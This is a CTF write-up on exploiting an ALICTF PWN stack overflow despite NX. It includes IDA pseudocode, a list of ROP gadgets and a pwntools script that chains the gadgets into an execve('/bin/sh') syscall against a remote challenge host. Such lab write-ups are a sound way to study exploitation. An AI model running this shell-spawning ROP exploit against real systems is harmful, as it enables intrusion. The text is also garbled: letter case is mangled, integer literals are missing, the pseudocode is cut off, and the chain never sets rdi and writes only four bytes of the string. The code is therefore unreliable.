Even when NX is enabled, a program that contains a syscall instruction can still have a stack overflow exploited through ROP to issue syscall 59, execve('/bin/sh', NULL, NULL). This is the experience from one ALICTF PWN challenge.
Locating the vulnerability with IDA together with GDB gives the following:
// IDA pseudocode of the vulnerable routine as reproduced on the page. The listing is
// truncated: the body of the final `if` and the function's closing brace are missing,
// and several tokens were mangled in extraction (spacing/case in the declarations, the
// IDA register annotations, and the first constant in the `if`). Tokens are kept as printed.
signed __int64 __fastcall sub_40108e (__int64 A1) {
    signed __int64 result;  // return value; IDA register annotation garbled on the page
    __int64 v2;             // IDA register annotation garbled on the page
    intV3;                  // [sp+10h] [bp-40h]@1  -- reads `int v3`: start of the local buffer that sub_400330 fills
    __int64 v4;             // [sp+20h] [bp-30h]@1
    __int64 v5;             // [sp+28h] [bp-28h]@1
    __int64 V6;             // [sp+30h] [bp-20h]@1
    __int64 V7;             // [sp+38h] [bp-18h]@1
    __int64 V8;             // [sp+40h] [bp-10h]@1
    UnsignedintV9;          // [sp+48h] [bp-8h]@7   -- reads `unsigned int v9`
    intV10;                 // [sp+4ch] [bp-4h]@4   -- reads `int v10`
    // Zero-initialise the locals that make up the buffer.
    V4=0LL; V5=0LL; V6=0LL; V7=0LL; V8=0LL; V3=0;
    // Copies 80 bytes of input into a frame whose buffer starts at bp-40h (64 bytes below
    // the saved frame pointer): the copy runs through the saved rbp and into the return
    // address, so the last 8 input bytes control `ret`. A length bounded by the buffer
    // size, or a stack canary, would stop this; NX alone does not, because the overwritten
    // return address can point at code that is already executable.
    sub_400330 ((__int64)&v3, A1, 80LL);
    // Login check on the first two input bytes: BYTE1(v3) != 121 compares against 'y'; the
    // first constant is garbled on the page (the author's note says the prefix "py" passes).
    // The branch body and the remainder of the function are not shown on the page.
    if((_byte) v3! = the|| BYTE1 (v3)! =121)
The gadgets for building the syscall ROP chain, found with ROPgadget, are as follows:
0x46f208 : pop rax ; ret
0x401823 : pop rdi ; ret
0x462873 : pop rcx ; ret
0x422568 : mov dword ptr [rdi], ecx ; ret
0x46f205 : add rsp, 0x58 ; ret
0x43ae29 : pop rdx ; pop rsi ; ret
0x45f2a5 : syscall ; ret
The code used is as follows:
# Exploit script as printed in the write-up (pwntools). The page's extraction mangled
# letter case throughout (`fromPWN Import *`, `P64`/`p64`, `Pay`/`pay`, `IO`/`io`,
# `movrdircx`/`MOVRDIRCX`) and dropped two integer literals (`'a'* -` and `p64 ( -)`);
# the text is kept as printed and the gaps are not reconstructed here. The chain
# hard-codes absolute gadget addresses, so it depends on the binary not being
# position-independent; a stack canary would abort before the overwritten `ret` runs.
fromPWN Import *
#io=process ('./vss')
# Remote CTF endpoint used by the author; the local-process line above is commented out.
IO=remote ('114.55.103.213',2333)
# Gadget addresses (see the ROPgadget listing above). Prdiret is defined but not used below.
Praxret=0x46f208
Prdiret=0x401823
Prcxret=0x0000000000462873# pop RCX ret
movrdircx=0x422568
Addespret=0x46f205#add RSP 0x58; ret
prdxrsiret=0x43ae29
Syscallret=0x45f2a5
# Payload: "py" prefix passes the login check, then padding up to the return address
# (the padding count is missing on the page).
Pay='py'+'a'* -
Pay+=P64 (Addespret) +'a'*8 #add RSP 0x58; ret
Pay+=P64 (Praxret) +p64 ( -) #pop rax;ret  -- the syscall-number literal is missing on the page
pay+=P64 (Prcxret) +'/bin/sh\x00'+P64 (MOVRDIRCX) #pop Rcx;ret; mov dword ptr [RDI], ecx; RET
pay+=P64 (Prdxrsiret) +p64 (0) +p64 (0) #pop rdx;pop rsi;ret
pay+=p64 (Syscallret) #syscall; Ret
# As printed, the connection is bound to `IO` while the calls below use `io`.
io.recvuntil ('password:\n')
io.sendline (pay)
io.interactive ()
Stack overflow: ROP to syscall